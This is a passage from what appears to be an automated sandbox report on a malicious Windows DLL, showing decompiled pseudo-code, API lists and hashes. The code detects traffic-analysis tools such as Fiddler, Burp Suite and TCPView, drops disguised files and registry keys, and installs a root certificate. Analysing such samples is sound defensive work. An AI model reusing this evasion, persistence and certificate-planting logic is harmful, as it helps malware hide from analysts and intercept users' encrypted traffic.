                                                                                                                                                      0x10021a91
                                                                                                                                                      0x10021ab3
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021acd
                                                                                                                                                      0x10021ad6
                                                                                                                                                      0x10021ae1

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 854390245-0
                                                                                                                                                      • Opcode ID: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                      • Instruction ID: 2d82e108429a1e59b14db5b6321f6623d8f234d0aa847db4e2dbab4e051ccd9c
                                                                                                                                                      • Opcode Fuzzy Hash: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                      • Instruction Fuzzy Hash: BC0290B6D00218ABDB10DB90DC82FDE777DEB58340F4445A8F509A7285EB74AB44CFA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100133E0, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E100133E0(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10333818 = GetProcAddress(_t37, "FlsAlloc");
					 *0x1033381c = GetProcAddress(_t37, "FlsGetValue");
					 *0x10333820 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10333818;
					_t40 = TlsSetValue;
					 *0x10333824 = _t7;
					if( *0x10333818 == 0) {
						L6:
						 *0x1033381c = TlsGetValue;
						 *0x10333818 = E10013097;
						 *0x10333820 = _t40;
						 *0x10333824 = TlsFree;
					} else {
						__eflags =  *0x1033381c;
						if( *0x1033381c == 0) {
							goto L6;
						} else {
							__eflags =  *0x10333820;
							if( *0x10333820 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10332c6c = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1033381c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E100117FA();
							 *0x10333818 = E10012FC8( *0x10333818);
							 *0x1033381c = E10012FC8( *0x1033381c);
							 *0x10333820 = E10012FC8( *0x10333820);
							 *0x10333824 = E10012FC8( *0x10333824);
							_t18 = E1000F88D();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E100130CA();
								goto L15;
							} else {
								_push(L10013256);
								_t21 =  *((intOrPtr*)(E10013034( *0x10333818)))();
								__eflags = _t21 - 0xffffffff;
								 *0x10332c68 = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E100148B1(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x10332c68);
										__eflags =  *((intOrPtr*)(E10013034( *0x10333820)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10013107(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E100130CA();
					return 0;
				}
			}
















                                                                                                                                                      0x100133e0
                                                                                                                                                      0x100133ec
                                                                                                                                                      0x100133f0
                                                                                                                                                      0x10013410
                                                                                                                                                      0x1001341d
                                                                                                                                                      0x1001342a
                                                                                                                                                      0x1001342f
                                                                                                                                                      0x10013431
                                                                                                                                                      0x10013438
                                                                                                                                                      0x1001343e
                                                                                                                                                      0x10013443
                                                                                                                                                      0x1001345b
                                                                                                                                                      0x10013460
                                                                                                                                                      0x1001346a
                                                                                                                                                      0x10013474
                                                                                                                                                      0x1001347a
                                                                                                                                                      0x10013445
                                                                                                                                                      0x10013445
                                                                                                                                                      0x1001344c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001344e
                                                                                                                                                      0x1001344e
                                                                                                                                                      0x10013455
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10013457
                                                                                                                                                      0x10013457
                                                                                                                                                      0x10013459
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10013459
                                                                                                                                                      0x10013455
                                                                                                                                                      0x1001344c
                                                                                                                                                      0x1001347f
                                                                                                                                                      0x10013485
                                                                                                                                                      0x10013488
                                                                                                                                                      0x1001348d
                                                                                                                                                      0x1001355f
                                                                                                                                                      0x1001355f
                                                                                                                                                      0x1001355f
                                                                                                                                                      0x10013493
                                                                                                                                                      0x1001349a
                                                                                                                                                      0x1001349c
                                                                                                                                                      0x1001349e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100134a4
                                                                                                                                                      0x100134a4
                                                                                                                                                      0x100134ba
                                                                                                                                                      0x100134ca
                                                                                                                                                      0x100134da
                                                                                                                                                      0x100134e7
                                                                                                                                                      0x100134ec
                                                                                                                                                      0x100134f1
                                                                                                                                                      0x100134f3
                                                                                                                                                      0x1001355a
                                                                                                                                                      0x1001355a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100134f5
                                                                                                                                                      0x100134f5
                                                                                                                                                      0x10013506
                                                                                                                                                      0x10013508
                                                                                                                                                      0x1001350b
                                                                                                                                                      0x10013510
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10013512
                                                                                                                                                      0x1001351e
                                                                                                                                                      0x10013520
                                                                                                                                                      0x10013524
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10013526
                                                                                                                                                      0x10013526
                                                                                                                                                      0x10013527
                                                                                                                                                      0x1001353b
                                                                                                                                                      0x1001353d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001353f
                                                                                                                                                      0x1001353f
                                                                                                                                                      0x10013541
                                                                                                                                                      0x10013542
                                                                                                                                                      0x10013549
                                                                                                                                                      0x1001354f
                                                                                                                                                      0x10013553
                                                                                                                                                      0x10013557
                                                                                                                                                      0x10013557
                                                                                                                                                      0x1001353d
                                                                                                                                                      0x10013524
                                                                                                                                                      0x10013510
                                                                                                                                                      0x100134f3
                                                                                                                                                      0x1001349e
                                                                                                                                                      0x10013563
                                                                                                                                                      0x100133f2
                                                                                                                                                      0x100133f2
                                                                                                                                                      0x100133fa
                                                                                                                                                      0x100133fa

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000E9BD), ref: 100133E6
                                                                                                                                                      • __mtterm.LIBCMT ref: 100133F2
                                                                                                                                                        • Part of subcall function 100130CA: __decode_pointer.LIBCMT ref: 100130DB
                                                                                                                                                        • Part of subcall function 100130CA: TlsFree.KERNEL32(0000001D,1001355F), ref: 100130F5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10013408
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10013415
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10013422
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001342F
                                                                                                                                                      • TlsAlloc.KERNEL32 ref: 1001347F
                                                                                                                                                      • TlsSetValue.KERNEL32(00000000), ref: 1001349A
                                                                                                                                                      • __init_pointers.LIBCMT ref: 100134A4
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134AF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134BF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134CF
                                                                                                                                                      • __encode_pointer.LIBCMT ref: 100134DF
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10013500
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 10013519
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 10013533
                                                                                                                                                      • __initptd.LIBCMT ref: 10013542
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10013549
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                      • API String ID: 2657569430-3819984048
                                                                                                                                                      • Opcode ID: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                      • Instruction ID: fc5c9c1e2f27ce9595d1d322ac009eb1f7bdbda0747ab5db418f9efda91381a0
                                                                                                                                                      • Opcode Fuzzy Hash: e158e009452264019b86ef2b308fada79601061194b00a3a68f22d1eae1c8b62
                                                                                                                                                      • Instruction Fuzzy Hash: A3318D75C04221AADB12EB78CCC69057BE9EB843A1F10C53AF508DE2A2DB35D489CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100193D0, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100193D0(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				void* _t61;
				void* _t66;
				void* _t88;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t87 = __edi;
				_t70 = __ebx;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				_v268 = 0;
				E1000CF20(_t87,  &_v267, 0, 0x103);
				GetClassNameA(_a4,  &_v532, 0x104);
				GetWindowTextA(_a4,  &_v268, 0x104);
				_t35 = E1000CAC0( &_v532);
				_t91 = _t88 + 0x1c;
				_t108 = _t35;
				if(_t35 <= 0) {
					L30:
					return 1;
				}
				_t37 = E10019330(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
				_t92 = _t91 + 8;
				if(_t37 == 0) {
					_t38 = E10019330(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
					_t93 = _t92 + 8;
					__eflags = _t38;
					if(__eflags == 0) {
						_t39 = E10019330(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
						_t94 = _t93 + 8;
						__eflags = _t39;
						if(__eflags == 0) {
							_t41 = E10019330(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
							_t95 = _t94 + 8;
							__eflags = _t41;
							if(__eflags == 0) {
								_t42 = E10019330(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
								_t96 = _t95 + 8;
								__eflags = _t42;
								if(_t42 == 0) {
									_t43 = E1000CAC0( &_v268);
									_t97 = _t96 + 4;
									__eflags = _t43;
									if(__eflags <= 0) {
										L20:
										_t45 = E1000CAC0( &_v268);
										_t98 = _t97 + 4;
										__eflags = _t45;
										if(__eflags <= 0) {
											L23:
											_t46 = E10019330(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
											_t99 = _t98 + 8;
											__eflags = _t46;
											if(_t46 == 0) {
												goto L30;
											}
											_t48 = E1000CAC0( &_v268);
											_t100 = _t99 + 4;
											__eflags = _t48;
											if(__eflags <= 0) {
												L27:
												__eflags = E1000CAC0( &_v268);
												if(__eflags <= 0) {
													goto L30;
												}
												_t51 = E10019330(_t70, _t87, __eflags,  &_v268, "Burp Suite");
												__eflags = _t51;
												if(_t51 == 0) {
													goto L30;
												}
												 *0x10333dcc = 1;
												return 0;
											}
											_t53 = E10019330(_t70, _t87, __eflags,  &_v268, "Charles");
											_t100 = _t100 + 8;
											__eflags = _t53;
											if(_t53 == 0) {
												goto L27;
											}
											 *0x10333dcc = 1;
											return 0;
										}
										_t55 = E10019330(_t70, _t87, __eflags,  &_v268, "ASExplorer");
										_t98 = _t98 + 8;
										__eflags = _t55;
										if(__eflags == 0) {
											goto L23;
										}
										 *0x10333dcc = 1;
										return 0;
									}
									_t57 = E10019330(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
									_t97 = _t97 + 8;
									__eflags = _t57;
									if(_t57 == 0) {
										goto L20;
									}
									 *0x10333dcc = 1;
									return 0;
								}
								__eflags = E1000CAC0( &_v268);
								if(__eflags <= 0) {
									L16:
									goto L30;
								}
								_t61 = E10019330(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
								__eflags = _t61;
								if(_t61 == 0) {
									goto L16;
								}
								 *0x10333dcc = 1;
								return 0;
							}
							 *0x10333dcc = 1;
							return 0;
						}
						 *0x10333dcc = 1;
						return 0;
					}
					 *0x10333dcc = 1;
					return 0;
				}
				_t66 = E1000CAC0( &_v268);
				_t110 = _t66;
				if(_t66 <= 0 || E10019330(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
					goto L30;
				} else {
					 *0x10333dcc = 1;
					return 0;
				}
			}


































                                                                                                                                                      0x100193d0
                                                                                                                                                      0x100193d0
                                                                                                                                                      0x100193d9
                                                                                                                                                      0x100193ee
                                                                                                                                                      0x100193f6
                                                                                                                                                      0x1001940b
                                                                                                                                                      0x10019423
                                                                                                                                                      0x10019439
                                                                                                                                                      0x10019446
                                                                                                                                                      0x1001944b
                                                                                                                                                      0x1001944e
                                                                                                                                                      0x10019450
                                                                                                                                                      0x100196a0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100196a0
                                                                                                                                                      0x10019462
                                                                                                                                                      0x10019467
                                                                                                                                                      0x1001946c
                                                                                                                                                      0x100194bb
                                                                                                                                                      0x100194c0
                                                                                                                                                      0x100194c3
                                                                                                                                                      0x100194c5
                                                                                                                                                      0x100194e9
                                                                                                                                                      0x100194ee
                                                                                                                                                      0x100194f1
                                                                                                                                                      0x100194f3
                                                                                                                                                      0x10019517
                                                                                                                                                      0x1001951c
                                                                                                                                                      0x1001951f
                                                                                                                                                      0x10019521
                                                                                                                                                      0x10019545
                                                                                                                                                      0x1001954a
                                                                                                                                                      0x1001954d
                                                                                                                                                      0x1001954f
                                                                                                                                                      0x10019599
                                                                                                                                                      0x1001959e
                                                                                                                                                      0x100195a1
                                                                                                                                                      0x100195a3
                                                                                                                                                      0x100195d3
                                                                                                                                                      0x100195da
                                                                                                                                                      0x100195df
                                                                                                                                                      0x100195e2
                                                                                                                                                      0x100195e4
                                                                                                                                                      0x10019614
                                                                                                                                                      0x10019620
                                                                                                                                                      0x10019625
                                                                                                                                                      0x10019628
                                                                                                                                                      0x1001962a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019633
                                                                                                                                                      0x10019638
                                                                                                                                                      0x1001963b
                                                                                                                                                      0x1001963d
                                                                                                                                                      0x10019667
                                                                                                                                                      0x10019676
                                                                                                                                                      0x10019678
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019686
                                                                                                                                                      0x1001968e
                                                                                                                                                      0x10019690
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019692
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001969c
                                                                                                                                                      0x1001964b
                                                                                                                                                      0x10019650
                                                                                                                                                      0x10019653
                                                                                                                                                      0x10019655
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019657
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019661
                                                                                                                                                      0x100195f2
                                                                                                                                                      0x100195f7
                                                                                                                                                      0x100195fa
                                                                                                                                                      0x100195fc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100195fe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019608
                                                                                                                                                      0x100195b1
                                                                                                                                                      0x100195b6
                                                                                                                                                      0x100195b9
                                                                                                                                                      0x100195bb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100195bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100195c7
                                                                                                                                                      0x10019560
                                                                                                                                                      0x10019562
                                                                                                                                                      0x1001958d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001958d
                                                                                                                                                      0x10019570
                                                                                                                                                      0x10019578
                                                                                                                                                      0x1001957a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001957c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019586
                                                                                                                                                      0x10019523
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001952d
                                                                                                                                                      0x100194f5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100194ff
                                                                                                                                                      0x100194c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100194d1
                                                                                                                                                      0x10019475
                                                                                                                                                      0x1001947d
                                                                                                                                                      0x1001947f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019499
                                                                                                                                                      0x10019499
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100194a3

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 100193EE
                                                                                                                                                      • _memset.LIBCMT ref: 1001940B
                                                                                                                                                      • GetClassNameA.USER32(?,00000000,00000104), ref: 10019423
                                                                                                                                                      • GetWindowTextA.USER32 ref: 10019439
                                                                                                                                                      • _strlen.LIBCMT ref: 10019446
                                                                                                                                                        • Part of subcall function 10019330: _strlen.LIBCMT ref: 1001933B
                                                                                                                                                        • Part of subcall function 10019330: _strlen.LIBCMT ref: 10019349
                                                                                                                                                      • _strlen.LIBCMT ref: 10019475
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                      • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                      • API String ID: 1565133231-1140939848
                                                                                                                                                      • Opcode ID: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                      • Instruction ID: a5f97e290b41472754b7e9ce8727d5d20b8c63e5840e42e0df40fd03ad5c4008
                                                                                                                                                      • Opcode Fuzzy Hash: 5a0ce18abdde982357f7fdf8f1a79584a6c51237df7161ac394efa5431355cbd
                                                                                                                                                      • Instruction Fuzzy Hash: 1C51B7B995020956EB50C770AC85FDA72BCEB20348F444464AA099B142FBB5F7C8CF71
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FA30, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 137COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E1001FA30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v267;
				char _v268;
				char _v531;
				char _v532;
				char _v536;
				char _v803;
				char _v804;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t55;
				void* _t94;

				_t94 = __eflags;
				_t77 = __edi;
				_v536 = 0;
				_v532 = 0;
				E1000CF20(__edi,  &_v531, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0);
				E1000CD96( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
				_v804 = 0;
				E1000CF20(_t77,  &_v803, 0, 0x103);
				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
				E1000CD96( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
				_v268 = 0;
				E1000CF20(_t77,  &_v267, 0, 0x103);
				E1001F990(__ebx, _t77, __esi, _t94,  &_v268);
				_t44 = E1001F680(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8);
				_t95 = _t44;
				if(_t44 != 0) {
					_t46 = E1001F680(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8);
					_t96 = _t46;
					if(_t46 != 0) {
						_t48 = E1001F5F0( &_v532, _t96,  &_v532, _a4, _a8);
						_t97 = _t48;
						if(_t48 != 0) {
							_t50 = E1001F680( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8);
							_t98 = _t50;
							if(_t50 != 0) {
								_t52 = E1001F680(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8);
								_t99 = _t52;
								if(_t52 != 0 && E1001F5F0(_a4, _t99,  &_v804, _a4, _a8) != 0) {
									_t55 = E1001F720(__ebx, _t77, __esi, _a4, _a8);
									_t101 = _t55;
									if(_t55 != 0 && E1001F680( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8) != 0) {
										_v536 = 1;
									}
								}
							}
						}
					}
				}
				return _v536;
			}

















                                                                                                                                                      0x1001fa30
                                                                                                                                                      0x1001fa30
                                                                                                                                                      0x1001fa39
                                                                                                                                                      0x1001fa43
                                                                                                                                                      0x1001fa58
                                                                                                                                                      0x1001fa6d
                                                                                                                                                      0x1001fa84
                                                                                                                                                      0x1001fa8c
                                                                                                                                                      0x1001faa1
                                                                                                                                                      0x1001fab6
                                                                                                                                                      0x1001facd
                                                                                                                                                      0x1001fad5
                                                                                                                                                      0x1001faea
                                                                                                                                                      0x1001faf9
                                                                                                                                                      0x1001fb13
                                                                                                                                                      0x1001fb1b
                                                                                                                                                      0x1001fb1d
                                                                                                                                                      0x1001fb35
                                                                                                                                                      0x1001fb3d
                                                                                                                                                      0x1001fb3f
                                                                                                                                                      0x1001fb54
                                                                                                                                                      0x1001fb5c
                                                                                                                                                      0x1001fb5e
                                                                                                                                                      0x1001fb76
                                                                                                                                                      0x1001fb7e
                                                                                                                                                      0x1001fb80
                                                                                                                                                      0x1001fb94
                                                                                                                                                      0x1001fb9c
                                                                                                                                                      0x1001fb9e
                                                                                                                                                      0x1001fbc3
                                                                                                                                                      0x1001fbcb
                                                                                                                                                      0x1001fbcd
                                                                                                                                                      0x1001fbef
                                                                                                                                                      0x1001fbef
                                                                                                                                                      0x1001fbcd
                                                                                                                                                      0x1001fb9e
                                                                                                                                                      0x1001fb80
                                                                                                                                                      0x1001fb5e
                                                                                                                                                      0x1001fb3f
                                                                                                                                                      0x1001fc02

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FA58
                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FA6D
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FA84
                                                                                                                                                      • _memset.LIBCMT ref: 1001FAA1
                                                                                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FAB6
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001FACD
                                                                                                                                                      • _memset.LIBCMT ref: 1001FAEA
                                                                                                                                                        • Part of subcall function 1001F990: _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                        • Part of subcall function 1001F990: _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                        • Part of subcall function 1001F990: _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                        • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F75E
                                                                                                                                                        • Part of subcall function 1001F720: CryptStringToBinaryA.CRYPT32(10025F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7A3
                                                                                                                                                        • Part of subcall function 1001F720: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F7B3
                                                                                                                                                        • Part of subcall function 1001F720: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F7E2
                                                                                                                                                        • Part of subcall function 1001F720: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F801
                                                                                                                                                        • Part of subcall function 1001F720: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F972
                                                                                                                                                        • Part of subcall function 1001F720: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F97C
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB2B
                                                                                                                                                      • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FABC
                                                                                                                                                      • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FB8A
                                                                                                                                                      • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB09
                                                                                                                                                      • \Microsoft\Windows\win_a.dat, xrefs: 1001FA73
                                                                                                                                                      • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FB6C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                      • API String ID: 475603772-4188859120
                                                                                                                                                      • Opcode ID: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                      • Instruction ID: cda2b8cdb8d0272306c20495e764daec9aa036c5edc3e57df8df2dc1c216ebbd
                                                                                                                                                      • Opcode Fuzzy Hash: e1ebd68141a7c66a3fdbf1d9e38db6ba63d9e7a12b468ce7a0e084feb6249257
                                                                                                                                                      • Instruction Fuzzy Hash: D941457A944208B7EB04DB94EC86FF93368DB68344F14845CFB1C9A182E670EB848761
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100211B0, Relevance: 16.7, APIs: 11, Instructions: 232COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
